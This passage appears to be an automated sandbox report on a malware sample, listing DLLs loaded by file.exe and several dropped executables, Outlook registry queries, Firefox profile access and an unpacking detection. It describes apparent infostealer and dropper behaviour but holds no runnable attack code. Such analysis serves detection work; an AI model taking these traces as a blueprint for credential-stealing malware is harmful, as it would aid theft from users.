Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2521033172.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2521346401.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2521346401.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2521033172.000000006C74D000.00000002.00000001.01000000.00000008.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
